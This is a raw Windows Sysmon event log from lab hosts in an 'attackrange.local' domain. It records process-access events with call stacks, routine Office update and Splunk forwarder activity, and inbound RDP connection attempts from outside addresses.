Shared\ClickToRun\OfficeC2RClient.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063398Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.566{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063397Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.550{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063396Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.550{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063395Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.472{A7A01FEF-B626-607E-1600-00000000BB01}15402648C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063394Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.472{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063393Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.206{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063392Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.206{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063391Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.206{A7A01FEF-C0A6-607E-8105-00000000BB01}8362304C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063390Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.206{A7A01FEF-C0A6-607E-7B05-00000000BB01}18804408C:\Windows\system32\taskhostw.exe{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063389Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.206{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6164f|C:\Windows\System32\SHELL32.dll+62f35|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063388Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.206{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+62e4e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063387Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.206{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063386Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.206{A7A01FEF-C0A6-607E-8105-00000000BB01}8366128C:\Windows\Explorer.EXE{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063385Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.191{A7A01FEF-B626-607E-1300-00000000BB01}12644440C:\Windows\System32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000063384Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDBSetValue2021-04-20 14:53:41.191{A7A01FEF-B626-607E-1300-00000000BB01}1264C:\Windows\System32\svchost.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeBinary Data 10341000x800000000000000063383Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.191{A7A01FEF-B626-607E-1300-00000000BB01}12641420C:\Windows\System32\svchost.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\pcasvc.dll+52e4|c:\windows\system32\pcasvc.dll+58a9|c:\windows\system32\pcasvc.dll+5b49|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063382Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.191{A7A01FEF-B626-607E-1300-00000000BB01}12641420C:\Windows\System32\svchost.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000063381Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.175{A7A01FEF-C0A3-607E-6C05-00000000BB01}36241208C:\Windows\system32\csrss.exe{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000063380Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.175{A7A01FEF-C0A6-607E-8105-00000000BB01}836584C:\Windows\Explorer.EXE{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e69f|C:\Windows\System32\windows.storage.dll+16e315|C:\Windows\System32\windows.storage.dll+16de06|C:\Windows\System32\windows.storage.dll+16f278|C:\Windows\System32\windows.storage.dll+16dc2e|C:\Windows\System32\windows.storage.dll+fd025|C:\Windows\System32\windows.storage.dll+fd3a4|C:\Windows\System32\windows.storage.dll+fc9e0|C:\Windows\System32\SHELL32.dll+3cd0f|C:\Windows\System32\SHELL32.dll+3cb9c|C:\Windows\System32\SHELL32.dll+dcb5e|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000063379Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.980{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56874-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000063378Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.853{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57462-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 354300x800000000000000063377Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.849{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57461-false104.76.200.56a104-76-200-56.deploy.static.akamaitechnologies.com80http 354300x800000000000000063376Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.823{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57460-false2.16.106.224a2-16-106-224.deploy.static.akamaitechnologies.com80http 354300x800000000000000063375Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.818{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57459-false104.76.200.56a104-76-200-56.deploy.static.akamaitechnologies.com80http 354300x800000000000000063374Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.585{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57457-false52.113.194.132-443https 354300x800000000000000063373Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.584{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57458-false52.109.88.34-443https 354300x800000000000000063372Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.373{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57455-false52.113.194.132-443https 354300x800000000000000063371Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.371{A7A01FEF-EAF3-607E-6D0B-00000000BB01}4484C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57456-false52.109.88.34-443https 354300x800000000000000063370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:39.357{A7A01FEF-B636-607E-2D00-00000000BB01}2212C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-339.attackrange.local61729- 23542300x800000000000000049298Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:42.901{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0495126F6C2FBD4AEE1513DA968C16F,SHA256=82BB1CC765CB87BC39894720B025CB51F0A1C120CC8F964BB959D91C0744D915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063421Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:42.597{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27B76900367197B5B71D5AE7D22EFF1C,SHA256=DEEA39428EE155A616BA035D259340FBE1295FFD6EEC25C0DE190B10F1D8FE45,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049297Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:40.760{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52474-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049296Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:40.303{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com55738-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000049295Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:40.216{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-62252-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049294Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:42.401{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E199A3924CF5E761A3BAEEE4B4B46E1D,SHA256=3BB1023F830BF1014FBD283CC6BE133D9D45AA9CB2D5FBA0271ADD88E2A785CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063420Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:40.013{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-54142-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000063431Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:43.628{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AF50150B626AC9AECF1C5296D78CF08,SHA256=DC48ABCBB2421FB518B4D61A941F5E004EC91DFF802C037F26731AA792858382,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049299Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:43.948{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=223DBE0976E23BA1D48AB46CE967037D,SHA256=AF757D40C374CF7144462FC0F96D61C50F25F670A706F97FF63C6E81C63B220C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000063430Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:43.222{A7A01FEF-B626-607E-1600-00000000BB01}1540NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\ClickToRun\ProductReleases\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\BIT6FA1.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000063429Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.768{A7A01FEF-EAF4-607E-6F0B-00000000BB01}5156C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-339.attackrange.local57463-false52.109.88.34-443https 354300x800000000000000063428Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:41.444{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-55507-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 